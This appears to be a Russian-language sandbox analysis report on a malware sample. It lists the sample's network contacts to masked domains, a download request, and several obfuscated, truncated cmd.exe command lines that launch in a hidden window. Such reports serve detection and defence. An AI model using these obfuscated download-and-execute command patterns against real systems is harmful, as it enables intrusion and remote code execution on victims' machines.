Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c ^f^O^r ; ; /^F , ; " tokens= 2 delims=EFHMN" ; %^h ; ; ^iN ; ( , ' ; ft^^YpE , ; ^| ; fiNd^^str , H^^C ' ; ; ) ; ^do , ; %^h; ; n8ZAmId/vs~*t^@^Y)PUA^ ; ; h0XobFu/^C " ...
Сетевая активность
Подключается к
- 'fa#####ainfinito.com':80
- 'fa#####ainfinito.com':443
TCP
Запросы HTTP GET
- http://fa#####ainfinito.com/EuuM4
Другие
- 'fa#####ainfinito.com':443
UDP
- DNS ASK fa#####ainfinito.com
- DNS ASK fi###eashop.ru
- DNS ASK er##tech.eu
- DNS ASK ev###city.net
- DNS ASK wo#####ss.logoinn.me
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ^f^O^r ; ; /^F , ; " tokens= 2 delims=EFHMN" ; %^h ; ; ^iN ; ( , ' ; ft^^YpE , ; ^| ; fiNd^^str , H^^C ' ; ; ) ; ^do , ; %^h; ; n8ZAmId/vs~*t^@^Y)PUA^ ; ; h0XobFu/^C " ...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ft^YpE | fiNd^str H^C
- '<SYSTEM32>\cmd.exe' /S /D /c" ftYpE "
- '<SYSTEM32>\findstr.exe' HC
- '<SYSTEM32>\cmd.exe' ; ; n8ZAmId/vs~*t@Y)PUA ; ; h0XobFu/C " , , ( (s^ET ^ ^` ^ =E=6^l2u^\^h^s'^y4D^w^XoWJNzL@^b^anGx, ^Ri^{f.P1+Fcme^3^v^0/jB^(krd;^}Z^)-^:tM^Sg^$^pOC) , ; , )& , ; f^oR , ; %^...
